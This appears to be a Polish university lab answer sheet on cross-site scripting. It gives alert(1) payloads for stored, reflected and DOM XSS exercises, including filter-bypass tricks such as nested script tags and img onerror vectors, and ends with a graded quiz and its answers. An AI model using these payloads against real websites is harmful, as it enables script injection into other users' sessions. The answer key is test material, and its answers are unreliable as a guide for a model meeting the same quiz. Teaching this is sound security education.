# ![PJATK](../../.assets/banner.png)

**Zadanie 1: Podatność typu Stored XSS** \
Aplikacja posiada funkcjonalność komentarzy pozwalającą na skomentowanie wpisu na stronie WWW. Użyj funkcjonalności komentarzy strony w celu przeprowadzenia ataku typu Stored XSS.

```
<script>
alert(1)
</script>
```

**Zadanie 2: Podatność typu Reflected XSS** \
Aplikacja posiada funkcjonalność wyszukiwania, prezentującą użytkownikowi wyniki wyszukiwania wpisanej przez niego frazy. Użyj funkcjonalności wyszukiwania w celu przeprowadzenia ataku typu DOM XSS oraz uzyskania odpowiedzi na zadanie.

```
http://<adres>/?query=<script>alert(1)</script>
```

**Zadanie 3: Podatność typu DOM XSS** \
Aplikacja posiada funkcjonalność wyszukiwania, prezentującą użytkownikowi wyniki wyszukiwania wpisanej przez niego frazy. Użyj funkcjonalności wyszukiwania w celu przeprowadzenia ataku typu DOM XSS oraz uzyskania odpowiedzi na zadanie.

```
http://<adres>/?language=<script>alert(1)</script>
```

**Zadanie 4: Podatność typu XSS (inny wektor)** \
Aplikacja posiada funkcjonalność komentarzy pozwalająca na skomentowanie wpisu na stronie WWW. Użyj funkcjonalności komentarzy strony w celu przeprowadzenia ataku typu XSS oraz uzyskania odpowiedzi na zadanie. Tym razem aplikacja nie pozwala na osadzenie skryptu JS w treści komentarza.

```
"body": "comment_image_url=static%2Fimg%2Fuser-avatar-placeholder.png\"><script>alert(1)</script>\"&comment=a"
```

**Zadanie 5: Podatność typu XSS (filtrowane tagi)** \
Aplikacja posiada funkcjonalność komentarzy pozwalająca na skomentowanie wpisu na stronie WWW. Użyj funkcjonalności komentarzy strony w celu przeprowadzenia ataku typu XSS oraz uzyskania odpowiedzi na zadanie. Tym razem aplikacja posiada mechanizm czyszczenia wpisów z niebezpiecznych tagów HTML.

```
AAA<scr<script>ipt>alert(1)</sc<script>ript>BBB
```

**Zadanie 6: Podatność typu XSS (lepiej filtrowane tagi)** \
Aplikacja posiada funkcjonalność komentarzy pozwalająca na skomentowanie wpisu na stronie WWW. Użyj funkcjonalności komentarzy strony w celu przeprowadzenia ataku typu XSS oraz uzyskania odpowiedzi na zadanie. Tym razem aplikacja posiada ulepszony mechanizm czyszczenia wpisów z niebezpiecznych tagów HTML.

```
AAA<img onerror=alert(1) src=x />BBB
```

**Zadanie 7: Podatność typu XSS (walidacja wejścia)** \
Aplikacja posiada funkcjonalność komentarzy pozwalająca na skomentowanie wpisu na stronie WWW. Użyj funkcjonalności komentarzy strony w celu przeprowadzenia ataku typu XSS oraz uzyskania odpowiedzi na zadanie. Tym razem aplikacja waliduje dane wejściowe.

```
AAA<img/src="x"/onerror="alert(1)"/>
```


**Test sprawdzający**:

**Oceń prawdziwość zdania. Język HTML jest językiem programowania.** \
Fałsz

**Które z poniższych pól pozwala na wykorzystanie podatności DOM XSS?** \
innerHTML

**Który z poniższych ataków XSS nie wymaga aktywności serwera do udanego wstrzyknięcia kodu?** \
DOM XSS

**Który z poniższych ataków XSS polega na wstrzyknięciu złośliwego kodu, który będzie przechowywany w zewnętrznym źródle?** \
Stored XSS

**Który z poniższych ataków XSS wymaga manipulacji żądania HTTP za każdym razem?** \
Reflected XSS

**Oceń prawdziwość zdania. Ataki Cross Site Scripting polegają tylko i wyłącznie na wstrzyknięciu kodu skryptowego po stronie użytkownika.** \
Fałsz

**Oceń prawdziwość zdania. Złośliwy kod JavaScript może zostać wstrzyknięty tylko i wyłącznie pomiędzy znacznikami <script></script>.** \
Fałsz

